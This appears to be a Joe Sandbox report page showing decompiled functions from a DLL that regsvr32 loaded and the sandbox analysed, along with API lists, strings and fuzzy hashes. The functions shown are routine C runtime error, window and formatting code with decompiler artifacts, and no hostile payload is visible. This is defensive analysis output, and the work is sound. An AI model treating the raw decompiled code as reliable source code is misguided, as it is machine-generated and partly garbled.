Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Locale$Info$Valid$CodeCurrentDefaultPageProcessUser_amsg_exit_getptd_itow_s
String ID: ACP$Norwegian-Nynorsk$OCP
API String ID: 2581548026-4064345498
Opcode ID: d362c72375b2087135f792d1d44b420b2d12033d331d9674696bc88b6a400c57
Instruction ID: 738564248ae31f28377f87c312f6771be30b692c8f0f26582d45f6582c7cf820
Opcode Fuzzy Hash: d362c72375b2087135f792d1d44b420b2d12033d331d9674696bc88b6a400c57
Instruction Fuzzy Hash: 7D816D61B0A74286FB669F229A203B9A391EF46B44F148035CA4D026A5DFFCF945F3C5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06732C Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159
fileCOMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 67%

			E00007FFD7FFD2B06732C(void* __ecx, void* __eflags, long long __rbx, long long __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
				void* _v24;
				signed int _v40;
				intOrPtr _v53;
				char _v552;
				void* _v568;
				long long _v584;
				void* _t33;
				void* _t39;
				signed long long _t83;
				signed long long _t84;
				signed long long _t85;
				signed long long _t88;
				signed long long _t90;
				void* _t105;
				void* _t112;
				void* _t120;
				void* _t131;
				void* _t134;

				_t115 = __rsi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t83 =  *0x2b0c70a0; // 0xf787487f4682
				_t84 = _t83 ^ _t120 - 0x00000250;
				_v40 = _t84;
				E00007FFD7FFD2B067300(__ecx);
				_t90 = _t84;
				if (_t84 == 0) goto 0x2b06755c;
				_t5 = _t115 + 3; // 0x3
				if (E00007FFD7FFD2B0732BC(_t5, _t84) == 1) goto 0x2b0674f4;
				_t6 = _t115 + 3; // 0x3
				if (E00007FFD7FFD2B0732BC(_t6, _t84) != 0) goto 0x2b067398;
				if ( *0x2b0c8ab8 == 1) goto 0x2b0674f4;
				if (__ecx == 0xfc) goto 0x2b06755c;
				r12d = 0x314;
				if (E00007FFD7FFD2B073250(_t84, 0x2b0c90a0, _t105, L"Runtime Error!\n\nProgram: ") != 0) goto 0x2b0674e1;
				r8d = 0x104;
				 *0x2b0c92da = 0;
				if (GetModuleFileNameW(??, ??, ??) != 0) goto 0x2b06741d;
				if (E00007FFD7FFD2B073250(_t84, 0x2b0c90d2, 0x2b0c90d2, L"<program name unknown>") == 0) goto 0x2b06741d;
				r9d = 0;
				r8d = 0;
				_v584 = __rsi;
				E00007FFD7FFD2B06938C();
				asm("int3");
				_t33 = E00007FFD7FFD2B073234(_t32, 0x2b0c90d2);
				_t85 = _t84 + 1;
				if (_t85 - 0x3c <= 0) goto 0x2b067475;
				E00007FFD7FFD2B073234(_t33, 0x2b0c90d2);
				r9d = 3;
				_t88 = 0x2b0c90a0 + _t85 * 2 - 0x44 - 0x2b0c90d2 >> 1;
				if (E00007FFD7FFD2B073164(_t88, 0x2b0c90a0 + _t85 * 2 - 0x44, _t112 - _t88, L"...", _t131) == 0) goto 0x2b067475;
				r9d = 0;
				r8d = 0;
				_v584 = __rsi;
				E00007FFD7FFD2B06938C();
				asm("int3");
				if (E00007FFD7FFD2B0730DC(_t88, 0x2b0c90a0, _t134, L"\n\n") != 0) goto 0x2b0674cc;
				if (E00007FFD7FFD2B0730DC(_t88, 0x2b0c90a0, _t134, _t90) != 0) goto 0x2b0674b7;
				r8d = 0x12010;
				E00007FFD7FFD2B072ED4(0x2b0c90a0, L"Microsoft Visual C++ Runtime Library", _t131);
				goto 0x2b06755c;
				r9d = 0;
				r8d = 0;
				_v584 = __rsi;
				E00007FFD7FFD2B06938C();
				asm("int3");
				r9d = 0;
				r8d = 0;
				_v584 = __rsi;
				E00007FFD7FFD2B06938C();
				asm("int3");
				r9d = 0;
				r8d = 0;
				_v584 = __rsi;
				E00007FFD7FFD2B06938C();
				asm("int3");
				_t39 = GetStdHandle(??);
				if (_t88 == 0) goto 0x2b06755c;
				if (_t88 == 0xffffffff) goto 0x2b06755c;
				_t16 =  &_v552; // 0x354
				 *_t16 =  *_t90;
				if ( *_t90 == 0) goto 0x2b06752f;
				if (1 - 0x1f4 < 0) goto 0x2b067514;
				_v53 = sil;
				E00007FFD7FFD2B0653B0(_t39,  &_v552);
				_v584 = __rsi;
				WriteFile(??, ??, ??, ??, ??);
				return E00007FFD7FFD2B064980( *_t90, _v40 ^ _t120 - 0x00000250,  &_v552, _t88);
			}

0x7ffd2b06732c
0x7ffd2b06732c
0x7ffd2b067331
0x7ffd2b067336
0x7ffd2b067347
0x7ffd2b06734e
0x7ffd2b067351
0x7ffd2b06735b
0x7ffd2b067362
0x7ffd2b067368
0x7ffd2b06736e
0x7ffd2b067379
0x7ffd2b06737f
0x7ffd2b067389
0x7ffd2b067392
0x7ffd2b06739e
0x7ffd2b0673ab
0x7ffd2b0673c7
0x7ffd2b0673d4
0x7ffd2b0673da
0x7ffd2b0673f1
0x7ffd2b067406
0x7ffd2b067408
0x7ffd2b06740b
0x7ffd2b067412
0x7ffd2b067417
0x7ffd2b06741c
0x7ffd2b067420
0x7ffd2b067425
0x7ffd2b06742c
0x7ffd2b067431
0x7ffd2b06743d
0x7ffd2b06744e
0x7ffd2b06745e
0x7ffd2b067460
0x7ffd2b067463
0x7ffd2b06746a
0x7ffd2b06746f
0x7ffd2b067474
0x7ffd2b067489
0x7ffd2b06749b
0x7ffd2b0674a4
0x7ffd2b0674ad
0x7ffd2b0674b2
0x7ffd2b0674b7
0x7ffd2b0674ba
0x7ffd2b0674c1
0x7ffd2b0674c6
0x7ffd2b0674cb
0x7ffd2b0674cc
0x7ffd2b0674cf
0x7ffd2b0674d6
0x7ffd2b0674db
0x7ffd2b0674e0
0x7ffd2b0674e1
0x7ffd2b0674e4
0x7ffd2b0674e9
0x7ffd2b0674ee
0x7ffd2b0674f3
0x7ffd2b0674f9
0x7ffd2b067505
0x7ffd2b06750b
0x7ffd2b06750f
0x7ffd2b067516
0x7ffd2b06751c
0x7ffd2b06752d
0x7ffd2b067534
0x7ffd2b06753c
0x7ffd2b067551
0x7ffd2b067556
0x7ffd2b067588

APIs

_set_error_mode.LIBCMT ref: 00007FFD2B067371
_set_error_mode.LIBCMT ref: 00007FFD2B067382
GetModuleFileNameW.KERNEL32 ref: 00007FFD2B0673E4

Part of subcall function 00007FFD2B06938C: GetCurrentProcess.KERNEL32(?,?,?,?,00007FFD2B069442), ref: 00007FFD2B0693A4

GetStdHandle.KERNEL32 ref: 00007FFD2B0674F9
WriteFile.KERNEL32 ref: 00007FFD2B067556

Strings

Microsoft Visual C++ Runtime Library, xrefs: 00007FFD2B06749D
<program name unknown>, xrefs: 00007FFD2B0673F3
Runtime Error!Program: , xrefs: 00007FFD2B0673B1
..., xrefs: 00007FFD2B067436

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 2183313154-4022980321
Opcode ID: d0b2ab18d4dcb737b88f304bfd9d54b47c85ddb07edf073f73903026096e790d
Instruction ID: bb86e7c78521259ce4ec8ddef2ec131fec54c7d6283d1092bcedd622291c993c
Opcode Fuzzy Hash: d0b2ab18d4dcb737b88f304bfd9d54b47c85ddb07edf073f73903026096e790d
Instruction Fuzzy Hash: A4511A31B0A65245FB26DB256E3667A7250FF8B780F404131EE5D03AB5CFBCE505A680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0638E8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 86comregistrywindowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00007FFD2B06393C
RegisterTouchWindow.USER32 ref: 00007FFD2B063956
MessageBoxW.USER32 ref: 00007FFD2B063974
CoCreateInstance.OLE32 ref: 00007FFD2B06399C
ShowWindow.USER32 ref: 00007FFD2B063A3D
UpdateWindow.USER32 ref: 00007FFD2B063A46

Strings

Cannot register application window for multi-touch input, xrefs: 00007FFD2B063967
Error, xrefs: 00007FFD2B063960

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Window$Create$InstanceMessageRegisterShowTouchUpdate
String ID: Cannot register application window for multi-touch input$Error
API String ID: 2622382097-480840240
Opcode ID: 321e047565b7b9481e35a44dd1e50921cbcd63a5be62ce940b5462df4ae96a7f
Instruction ID: 341d19a41023e955e0a9b53af5d022fe0881ec7e7661256b426f152e63f3a5a4
Opcode Fuzzy Hash: 321e047565b7b9481e35a44dd1e50921cbcd63a5be62ce940b5462df4ae96a7f
Instruction Fuzzy Hash: 95414971B0AB0686EB128B15EE6537823A0FB8AB54F104135C64E477B0DFBCE549E790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B073CE8 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 82%

			E00007FFD7FFD2B073CE8(void* __eflags, intOrPtr* __rax, long long __rbx, unsigned int* __rcx, char* __rdx, long long __rdi, void* __r8, void* __r9, void* __r10, void* __r11, signed long long _a8, long long _a16, long long _a24, signed int _a40, intOrPtr _a48) {
				void* _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v72;
				long long _v80;
				intOrPtr _v88;
				void* _t91;
				char _t92;
				signed char _t93;
				signed int _t119;
				signed int _t120;
				void* _t150;
				intOrPtr* _t166;
				signed long long _t170;
				intOrPtr* _t186;
				signed int* _t187;
				signed long long _t205;
				signed long long _t214;
				void* _t215;
				signed long long _t220;
				signed long long _t222;
				signed long long _t223;
				signed long long _t226;
				signed long long _t227;
				char* _t232;
				char* _t233;
				intOrPtr* _t234;
				void* _t235;
				intOrPtr* _t236;
				char* _t237;
				void* _t238;
				char* _t240;
				void* _t241;
				char* _t242;
				char* _t243;
				char* _t244;
				char* _t245;
				char* _t256;
				void* _t258;
				void* _t261;
				long long _t263;
				intOrPtr* _t264;

				_t258 = __r10;
				_t166 = __rax;
				_a16 = __rbx;
				_a24 = __rdi;
				_t232 = __rdx;
				r12d = r9d;
				_a8 = 0x3ff;
				r13d = 0x30;
				E00007FFD7FFD2B066AE4(__rax,  &_v72, _a48);
				r15d = 0;
				r12d =  <  ? r15d : r12d;
				if (__rdx != 0) goto 0x2b073d5f;
				E00007FFD7FFD2B067698(_t166);
				 *_t166 = __rdx + 0x16;
				E00007FFD7FFD2B069444();
				if (_v48 == r15b) goto 0x2b073d58;
				 *(_v56 + 0xc8) =  *(_v56 + 0xc8) & 0xfffffffd;
				goto 0x2b0740ae;
				if (__r8 != 0) goto 0x2b073d88;
				E00007FFD7FFD2B067698(_t166);
				 *_t166 = 0x16;
				E00007FFD7FFD2B069444();
				if (_v48 == r15b) goto 0x2b073d58;
				 *(_v56 + 0xc8) =  *(_v56 + 0xc8) & 0xfffffffd;
				goto 0x2b073d58;
				 *((intOrPtr*)(__rdx)) = r15b;
				_t205 = _t261 + 0xb;
				if (__r8 - _t205 > 0) goto 0x2b073da4;
				E00007FFD7FFD2B067698(_v56);
				goto 0x2b073d40;
				_t170 =  *__rcx >> 0x00000034 & _t205;
				if (_t170 != _t205) goto 0x2b073e4f;
				_t220 = __rdx + 2;
				r9d = r12d;
				_t253 =  ==  ? __r8 : __r8 - 2;
				_v80 = _t263;
				_v88 = r15d;
				if (E00007FFD7FFD2B073BD4(__rcx, _t220,  ==  ? __r8 : __r8 - 2) == 0) goto 0x2b073e02;
				 *_t232 = r15b;
				if (_v48 == r15b) goto 0x2b0740ae;
				 *(_v56 + 0xc8) =  *(_v56 + 0xc8) & 0xfffffffd;
				goto 0x2b0740ae;
				if ( *((char*)(_t232 + 2)) != 0x2d) goto 0x2b073e0e;
				 *_t232 = 0x2d;
				_t233 = _t232 + 1;
				 *_t233 = 0x30;
				asm("sbb cl, cl");
				 *((char*)(_t233 + 1)) = 0x158;
				E00007FFD7FFD2B07863C(0x65, _t233 + 2,  ==  ? __r8 : __r8 - 2);
				if (_t170 == 0) goto 0x2b073e46;
				asm("sbb cl, cl");
				 *_t170 = 0xb0;
				 *((intOrPtr*)(_t170 + 3)) = r15b;
				goto 0x2b07409f;
				if (( *__rcx & 0x00000000) == 0) goto 0x2b073e64;
				 *_t233 = 0x2d;
				_t234 = _t233 + 1;
				r9d = _a40;
				r11d = 0x30;
				 *_t234 = r11b;
				asm("sbb cl, cl");
				asm("sbb edx, edx");
				 *((char*)(_t234 + 1)) = 0x118;
				if (( *__rcx & 0x00000000) != 0) goto 0x2b073ec6;
				 *((intOrPtr*)(_t234 + 2)) = r11b;
				_t235 = _t234 + 3;
				asm("dec eax");
				_a8 =  ~( *__rcx & 0xffffffff);
				goto 0x2b073ece;
				 *((char*)(_t235 + 2)) = 0x31;
				_t236 = _t235 + 3;
				_t264 = _t236;
				r10d = 0;
				_t237 = _t236 + 1;
				if (r12d != 0) goto 0x2b073ee1;
				 *_t264 = r10b;
				goto 0x2b073ef4;
				 *_t264 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v72 + 0x128))))));
				if (( *__rcx & 0xffffffff) <= 0) goto 0x2b073f88;
				if (r12d <= 0) goto 0x2b073f3b;
				_t91 = ( ~r9d & 0x000003fe) + r11w;
				_t150 = _t91 - 0x39;
				if (_t150 <= 0) goto 0x2b073f28;
				_t92 = _t91 + 0xffffffff00000087;
				 *_t237 = _t92;
				r12d = r12d - 1;
				_t238 = _t237 + 1;
				r13w = r13w + 0xfffc;
				if (_t150 >= 0) goto 0x2b073f07;
				if (r13w < 0) goto 0x2b073f88;
				if (_t92 - 8 <= 0) goto 0x2b073f88;
				_t186 = _t238 - 1;
				if ( *_t186 == 0x66) goto 0x2b073f64;
				if ( *_t186 != 0x46) goto 0x2b073f6c;
				 *_t186 = r11b;
				_t187 = _t186 - 1;
				goto 0x2b073f5a;
				if (_t187 == _t264) goto 0x2b073f85;
				_t119 =  *_t187;
				if (_t119 != 0x39) goto 0x2b073f7f;
				 *_t187 = 0xffffffff000000c1;
				goto 0x2b073f88;
				_t120 = _t119 + 1;
				 *_t187 = _t120;
				goto 0x2b073f88;
				 *((char*)(_t187 - 1)) =  *((char*)(_t187 - 1)) + 1;
				if (r12d <= 0) goto 0x2b073fac;
				r8d = r12d;
				_t93 = E00007FFD7FFD2B0656D0(_t92, _t120, r11b, _t238, _t220, 0 >> 4);
				r9d = _a40;
				r10d = 0;
				_t47 = _t258 + 0x30; // 0x30
				r11d = _t47;
				_t240 =  ==  ? _t264 : _t238 + 0xffffffff;
				r9d =  ~r9d;
				asm("sbb al, al");
				 *_t240 = (_t93 & 0x000000e0) + 0x70;
				if ( *_t264 - r10b < 0) goto 0x2b073fdb;
				 *((char*)(_t240 + 1)) = 0x2b;
				_t241 = _t240 + 2;
				goto 0x2b073fe6;
				 *((char*)(_t241 + 1)) = 0x2d;
				_t242 = _t241 + 2;
				_t214 =  ~(( *__rcx >> 0x34) - _a8);
				_t256 = _t242;
				 *_t242 = r11b;
				if (_t214 - 0x3e8 < 0) goto 0x2b074028;
				_t222 = (_t220 >> 7) + (_t220 >> 7 >> 0x3f);
				_t223 = _t222 * 0xfffffc18;
				 *_t242 = __r11 + _t222;
				_t243 = _t242 + 1;
				_t215 = _t214 + _t223;
				if (_t243 != _t256) goto 0x2b07402e;
				if (_t215 - 0x64 < 0) goto 0x2b07405c;
				_t226 = (_t223 + _t215 >> 6) + (_t223 + _t215 >> 6 >> 0x3f);
				_t227 = _t226 * 0xffffff9c;
				 *_t243 = __r11 + _t226;
				_t244 = _t243 + 1;
				if (_t244 != _t256) goto 0x2b074067;
				if (_t215 + _t227 - 0xa < 0) goto 0x2b074092;
				 *_t244 = __r11 + (_t227 >> 2) + (_t227 >> 2 >> 0x3f);
				_t245 = _t244 + 1;
				 *_t245 = (_t120 & 0x000007ff) + r11b;
				 *((intOrPtr*)(_t245 + 1)) = r10b;
				if (_v48 == r10b) goto 0x2b0740ac;
				 *(_v56 + 0xc8) =  *(_v56 + 0xc8) & 0xfffffffd;
				return 0;
			}

0x7ffd2b073ce8
0x7ffd2b073ce8
0x7ffd2b073ce8
0x7ffd2b073ced
0x7ffd2b073d02
0x7ffd2b073d10
0x7ffd2b073d16
0x7ffd2b073d1e
0x7ffd2b073d24
0x7ffd2b073d29
0x7ffd2b073d2f
0x7ffd2b073d36
0x7ffd2b073d38
0x7ffd2b073d40
0x7ffd2b073d42
0x7ffd2b073d4b
0x7ffd2b073d51
0x7ffd2b073d5a
0x7ffd2b073d62
0x7ffd2b073d64
0x7ffd2b073d6e
0x7ffd2b073d70
0x7ffd2b073d79
0x7ffd2b073d7f
0x7ffd2b073d86
0x7ffd2b073d8d
0x7ffd2b073d90
0x7ffd2b073d96
0x7ffd2b073d98
0x7ffd2b073da2
0x7ffd2b073db0
0x7ffd2b073db6
0x7ffd2b073dc4
0x7ffd2b073dc8
0x7ffd2b073dce
0x7ffd2b073dd2
0x7ffd2b073dd7
0x7ffd2b073de3
0x7ffd2b073de5
0x7ffd2b073dec
0x7ffd2b073df6
0x7ffd2b073dfd
0x7ffd2b073e06
0x7ffd2b073e08
0x7ffd2b073e0b
0x7ffd2b073e11
0x7ffd2b073e1d
0x7ffd2b073e25
0x7ffd2b073e2c
0x7ffd2b073e34
0x7ffd2b073e38
0x7ffd2b073e40
0x7ffd2b073e42
0x7ffd2b073e4a
0x7ffd2b073e5c
0x7ffd2b073e5e
0x7ffd2b073e61
0x7ffd2b073e64
0x7ffd2b073e68
0x7ffd2b073e7b
0x7ffd2b073e83
0x7ffd2b073e97
0x7ffd2b073e99
0x7ffd2b073ea5
0x7ffd2b073ea7
0x7ffd2b073eae
0x7ffd2b073eb8
0x7ffd2b073ec0
0x7ffd2b073ec4
0x7ffd2b073ec6
0x7ffd2b073eca
0x7ffd2b073ece
0x7ffd2b073ed1
0x7ffd2b073ed4
0x7ffd2b073eda
0x7ffd2b073edc
0x7ffd2b073edf
0x7ffd2b073ef1
0x7ffd2b073ef7
0x7ffd2b073f0a
0x7ffd2b073f1b
0x7ffd2b073f1f
0x7ffd2b073f23
0x7ffd2b073f25
0x7ffd2b073f28
0x7ffd2b073f2e
0x7ffd2b073f31
0x7ffd2b073f34
0x7ffd2b073f39
0x7ffd2b073f3f
0x7ffd2b073f54
0x7ffd2b073f56
0x7ffd2b073f5d
0x7ffd2b073f62
0x7ffd2b073f64
0x7ffd2b073f67
0x7ffd2b073f6a
0x7ffd2b073f6f
0x7ffd2b073f71
0x7ffd2b073f76
0x7ffd2b073f7b
0x7ffd2b073f7d
0x7ffd2b073f7f
0x7ffd2b073f81
0x7ffd2b073f83
0x7ffd2b073f85
0x7ffd2b073f8b
0x7ffd2b073f8d
0x7ffd2b073f99
0x7ffd2b073f9e
0x7ffd2b073fa5
0x7ffd2b073fa8
0x7ffd2b073fa8
0x7ffd2b073faf
0x7ffd2b073fb3
0x7ffd2b073fb6
0x7ffd2b073fbc
0x7ffd2b073fcf
0x7ffd2b073fd1
0x7ffd2b073fd5
0x7ffd2b073fd9
0x7ffd2b073fdb
0x7ffd2b073fdf
0x7ffd2b073fe3
0x7ffd2b073fe6
0x7ffd2b073fe9
0x7ffd2b073ff3
0x7ffd2b07400d
0x7ffd2b074014
0x7ffd2b07401b
0x7ffd2b07401d
0x7ffd2b074020
0x7ffd2b074026
0x7ffd2b07402c
0x7ffd2b074049
0x7ffd2b074050
0x7ffd2b074054
0x7ffd2b074056
0x7ffd2b07405f
0x7ffd2b074065
0x7ffd2b07408a
0x7ffd2b07408c
0x7ffd2b074099
0x7ffd2b07409b
0x7ffd2b07409f
0x7ffd2b0740a5
0x7ffd2b0740c7

APIs

Part of subcall function 00007FFD2B066AE4: _getptd.LIBCMT ref: 00007FFD2B066AF6

_errno.LIBCMT ref: 00007FFD2B073D38
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B073D42
_errno.LIBCMT ref: 00007FFD2B073D64
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B073D70
_errno.LIBCMT ref: 00007FFD2B073D98
_cftoe_l.LIBCMT ref: 00007FFD2B073DDC

Strings

gfffffff, xrefs: 00007FFD2B074067

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo$_cftoe_l_getptd
String ID: gfffffff
API String ID: 1282097019-1523873471
Opcode ID: 47ce03993f13529761602d467f072e9c290b970637875afc3916dd4e597c0ad0
Instruction ID: b61416c51a52a674a93b8f6da7c6d92629b4c94259392903853e0ef2bdc40d4a
Opcode Fuzzy Hash: 47ce03993f13529761602d467f072e9c290b970637875afc3916dd4e597c0ad0
Instruction Fuzzy Hash: 83B15963B4A3C646FB168B298A613ADABA5EB127D0F04C531DB1D077E5DA7CE411E380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B064980 Relevance: 12.1, APIs: 8, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 52%

			E00007FFD7FFD2B064980(signed int __ecx, intOrPtr* __rcx, void* __rdx, void* __r8) {
				intOrPtr _t10;
				void* _t12;
				signed int _t17;
				void* _t19;
				intOrPtr* _t23;
				void* _t26;

				_t12 = __rcx -  *0x2b0c70a0; // 0xf787487f4682
				if (_t12 != 0) goto 0x2b06499a;
				asm("dec eax");
				if ((__ecx & 0x0000ffff) != 0) goto 0x2b064996;
				asm("repe ret");
				asm("dec eax");
				goto 0x2b065c1c;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("o16 nop [eax+eax]");
				_t26 = __rdx - __rcx;
				if (__r8 - 8 < 0) goto 0x2b0649db;
				if ((__ecx & 0x00000007) == 0) goto 0x2b0649d2;
				if ( *__rcx !=  *((intOrPtr*)(_t26 + __rcx))) goto 0x2b0649f3;
				_t23 = __rcx + 1;
				_t17 = __ecx & 0x00000007;
				if (_t17 != 0) goto 0x2b0649c0;
				if (_t17 != 0) goto 0x2b0649fa;
				if (__r8 - 1 == 0) goto 0x2b0649ef;
				_t10 =  *_t23;
				_t19 = _t10 -  *((intOrPtr*)(_t26 + _t23));
				if (_t19 != 0) goto 0x2b0649f3;
				if (_t19 != 0) goto 0x2b0649e0;
				return _t10;
			}

0x7ffd2b064980
0x7ffd2b064987
0x7ffd2b064989
0x7ffd2b064992
0x7ffd2b064994
0x7ffd2b064996
0x7ffd2b06499a
0x7ffd2b06499f
0x7ffd2b0649a0
0x7ffd2b0649a1
0x7ffd2b0649a2
0x7ffd2b0649a3
0x7ffd2b0649a4
0x7ffd2b0649a5
0x7ffd2b0649a6
0x7ffd2b0649b0
0x7ffd2b0649b7
0x7ffd2b0649bc
0x7ffd2b0649c5
0x7ffd2b0649c7
0x7ffd2b0649cd
0x7ffd2b0649d0
0x7ffd2b0649d9
0x7ffd2b0649de
0x7ffd2b0649e0
0x7ffd2b0649e2
0x7ffd2b0649e5
0x7ffd2b0649ed
0x7ffd2b0649f2

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFD2B065C2F
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFD2B065C4E
RtlVirtualUnwind.KERNEL32 ref: 00007FFD2B065C9A
IsDebuggerPresent.KERNEL32 ref: 00007FFD2B065D0C
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFD2B065D24
UnhandledExceptionFilter.KERNEL32 ref: 00007FFD2B065D31
GetCurrentProcess.KERNEL32 ref: 00007FFD2B065D4A
TerminateProcess.KERNEL32 ref: 00007FFD2B065D58

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: a648bce5b8ee185fe204d0b57b0e5d3de350c2bcdd6a3980e7c46240e88fe07c
Instruction ID: 191496ec45a89f935b7e759e19a4862445d2f9b77fcd72ec93515d0aa4a24ab4
Opcode Fuzzy Hash: a648bce5b8ee185fe204d0b57b0e5d3de350c2bcdd6a3980e7c46240e88fe07c
Instruction Fuzzy Hash: 82314D35B0AF4689EB529B14FE6037A73A0FB4A350F500035DA8D427B5DFBCE444A798

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015524 Relevance: 10.9, Strings: 8, Instructions: 866COMMON

Download Yara Rule

Strings

.-, xrefs: 0000000180015C63
#*9\, xrefs: 00000001800165F6
DpY, xrefs: 000000018001605B
{`&F, xrefs: 0000000180016117
FX, xrefs: 0000000180016417
u, xrefs: 0000000180015D22
m!yq, xrefs: 00000001800156B4
E?b, xrefs: 0000000180015733

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
